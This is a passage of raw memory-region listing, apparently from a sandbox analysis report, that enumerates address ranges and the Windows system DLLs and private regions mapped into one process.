0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 306 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 307 start_va = 0x11e0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 308 start_va = 0x1c30000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 309 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 310 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 311 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 312 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 313 start_va = 0x1850000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 314 start_va = 0x1e70000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 315 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 316 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 317 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 434 start_va = 0x771b0000 end_va = 0x7722afff entry_point = 0x771b0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 435 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 436 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 437 start_va = 0x1bc0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 438 start_va = 0x1d30000 end_va = 0x1e0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 439 start_va = 0x6dda0000 end_va = 0x6ddd2fff entry_point = 0x6dda0000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll") Region: id = 440 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 441 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 442 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 443 start_va = 0x11d0000 end_va = 0x11d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 444 start_va = 0x11e0000 end_va = 0x11e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 445 start_va = 0x11f0000 end_va = 0x11f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 446 start_va = 0x1590000 end_va = 0x15fdfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001590000" filename = "" Region: id = 447 start_va = 0x2050000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 448 start_va = 0x21b0000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 449 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 450 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 451 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 452 start_va = 0x1200000 end_va = 0x1200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 453 start_va = 0x1600000 end_va = 0x1601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001600000" filename = "" Region: id = 454 start_va = 0x2410000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 455 start_va = 0x725f0000 end_va = 0x72604fff entry_point = 0x725f0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 456 start_va = 0x72610000 end_va = 0x72661fff entry_point = 0x72610000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 457 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 458 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 459 start_va = 0x1810000 end_va = 0x1810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 460 start_va = 0x6ddd0000 end_va = 0x6ddd5fff entry_point = 0x6ddd0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 461 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 462 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 463 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 464 start_va = 0x19f0000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 465 start_va = 0x26a0000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 466 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 467 start_va = 0x1820000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 468 start_va = 0x1990000 end_va = 0x19ecfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001990000" filename = "" Region: id = 469 start_va = 0x2550000 end_va = 0x264ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 470 start_va = 0x2770000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 471 start_va = 0x2870000 end_va = 0x2c62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 472 start_va = 0x6dd90000 end_va = 0x6dd94fff entry_point = 0x6dd90000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 473 start_va = 0x6dda0000 end_va = 0x6ddccfff entry_point = 0x6dda0000 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\System32\\ieui.dll" (normalized: "c:\\windows\\system32\\ieui.dll") Region: id = 474 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 475 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 476 start_va = 0x2d50000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 477 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 478 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 479 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 480 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 481 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 482 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 483 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 484 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 490 start_va = 0x1840000 end_va = 0x1840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" Region: id = 491 start_va = 0x1b40000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 492 start_va = 0x2f70000 end_va = 0x2faffff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 493 start_va = 0x30a0000 end_va = 0x319ffff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 494 start_va = 0x6dd60000 end_va = 0x6dd8afff entry_point = 0x6dd60000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 495 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 496 start_va = 0x1a00000 end_va = 0x1a01fff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 497 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 498 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 499 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 502 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 503 start_va = 0x1a10000 end_va = 0x1a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a10000" filename = "" Region: id = 504 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 505 start_va = 0x1a30000 end_va = 0x1a32fff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 506 start_va = 0x1c00000 end_va = 0x1c00fff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 507 start_va = 0x1c10000 end_va = 0x1c12fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 508 start_va = 0x1c20000 end_va = 0x1c22fff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 509 start_va = 0x1e10000 end_va = 0x1e12fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 510 start_va = 0x1e20000 end_va = 0x1e31fff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 511 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 512 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 513 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 514 start_va = 0x1f70000 end_va = 0x1f70fff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 515 start_va = 0x1f80000 end_va = 0x1f80fff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 516 start_va = 0x1f90000 end_va = 0x1f93fff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 517 start_va = 0x1fa0000 end_va = 0x1fa0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 518 start_va = 0x1fc0000 end_va = 0x1fc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 519 start_va = 0x3350000 end_va = 0x338ffff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 520 start_va = 0x3390000 end_va = 0x3cbffff entry_point = 0x3390000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 521 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 522 start_va = 0x1fb0000 end_va = 0x1fb7fff entry_point = 0x1fb0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 523 start_va = 0x1ff0000 end_va = 0x1ffdfff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 524 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 525 start_va = 0x1fd0000 end_va = 0x1fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 526 start_va = 0x1fe0000 end_va = 0x1fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 527 start_va = 0x2000000 end_va = 0x2000fff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 528 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 529 start_va = 0x2020000 end_va = 0x2020fff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 530 start_va = 0x2030000 end_va = 0x2030fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 531 start_va = 0x2040000 end_va = 0x2040fff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 532 start_va = 0x2150000 end_va = 0x2150fff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 533 start_va = 0x2160000 end_va = 0x2160fff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 534 start_va = 0x2170000 end_va = 0x2170fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 535 start_va = 0x2180000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 536 start_va = 0x2190000 end_va = 0x2190fff entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 537 start_va = 0x21a0000 end_va = 0x21a0fff entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 538 start_va = 0x22b0000 end_va = 0x22b0fff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 539 start_va = 0x22c0000 end_va = 0x22c0fff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 540 start_va = 0x22d0000 end_va = 0x22d0fff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 541 start_va = 0x22e0000 end_va = 0x22e0fff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 542 start_va = 0x23f0000 end_va = 0x23f0fff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 543 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 544 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 545 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 546 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 547 start_va = 0x2540000 end_va = 0x2540fff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 548 start_va = 0x2650000 end_va = 0x2650fff entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 549 start_va = 0x2660000 end_va = 0x2660fff entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 550 start_va = 0x2670000 end_va = 0x2670fff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 551 start_va = 0x2680000 end_va = 0x2680fff entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 552 start_va = 0x2690000 end_va = 0x2690fff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 553 start_va = 0x26b0000 end_va = 0x26b0fff entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 554 start_va = 0x26c0000 end_va = 0x26c0fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 555 start_va = 0x26d0000 end_va = 0x26d0fff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 556 start_va = 0x26e0000 end_va = 0x26e0fff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 557 start_va = 0x26f0000 end_va = 0x26f0fff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 558 start_va = 0x2700000 end_va = 0x2700fff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 559 start_va = 0x2710000 end_va = 0x2715fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 560 start_va = 0x2720000 end_va = 0x2720fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 561 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 562 start_va = 0x2740000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 563 start_va = 0x2760000 end_va = 0x2761fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 564 start_va = 0x2e50000 end_va = 0x2f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 565 start_va = 0x71930000 end_va = 0x71a9efff entry_point = 0x71930000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 566 start_va = 0x73f60000 end_va = 0x73f8efff entry_point = 0x73f60000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 567 start_va = 0x73f90000 end_va = 0x74041fff entry_point = 0x73f90000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 568 start_va = 0x2710000 end_va = 0x271dfff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 569 start_va = 0x2c70000 end_va = 0x2c70fff entry_point = 0x2c70000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 570 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 669 start_va = 0x2710000 end_va = 0x2712fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 670 start_va = 0x2c80000 end_va = 0x2c8dfff entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 671 start_va = 0x2c90000 end_va = 0x2caefff entry_point = 0x2c90000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 672 start_va = 0x2cb0000 end_va = 0x2cb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002cb0000" filename = "" Region: id = 673 start_va = 0x2cc0000 end_va = 0x2cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 674 start_va = 0x2cd0000 end_va = 0x2cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 675 start_va = 0x2ce0000 end_va = 0x2ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 676 start_va = 0x2cf0000 end_va = 0x2cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 677 start_va = 0x2d00000 end_va = 0x2d05fff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 678 start_va = 0x2d10000 end_va = 0x2d24fff entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 679 start_va = 0x2d30000 end_va = 0x2d31fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 680 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 681 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 682 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 683 start_va = 0x2fb0000 end_va = 0x2fd3fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 684 start_va = 0x3dc0000 end_va = 0x3ebffff entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 685 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 686 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 687 start_va = 0x2d40000 end_va = 0x2d40fff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 688 start_va = 0x2f50000 end_va = 0x2f58fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 689 start_va = 0x2f60000 end_va = 0x2f68fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 690 start_va = 0x2fe0000 end_va = 0x3003fff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 691 start_va = 0x31a0000 end_va = 0x329ffff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 692 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 693 start_va = 0x71870000 end_va = 0x718a0fff entry_point = 0x71870000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 694 start_va = 0x3010000 end_va = 0x3012fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003010000" filename = "" Region: id = 695 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 696 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 697 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 698 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 699 start_va = 0x3020000 end_va = 0x3023fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 700 start_va = 0x3030000 end_va = 0x303ffff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 701 start_va = 0x3040000 end_va = 0x3057fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 702 start_va = 0x3060000 end_va = 0x306ffff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: 